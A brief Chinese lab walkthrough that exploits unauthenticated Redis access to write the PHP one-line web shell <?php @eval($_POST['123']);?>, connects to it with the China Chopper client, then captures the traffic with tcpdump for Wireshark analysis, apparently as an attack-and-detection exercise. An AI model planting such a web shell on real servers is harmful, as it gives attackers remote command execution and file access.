环境需求:php服务、redis服务、apache服务开启
浏览器访问:服务器IP/index.php
利用redis未授权漏洞,进入redis交互模式,输入一句话木马
<?php @eval($_POST['123']);?>
浏览器访问:服务器IP/qwe.php
在windows端 使用chopper进行连接
点击进入,可以看到其中文件
进入虚拟终端:
在虚拟机使用tcpdump进行抓包
tcpdump -i eth0 -w 111.pcap
使用wireshark进行分析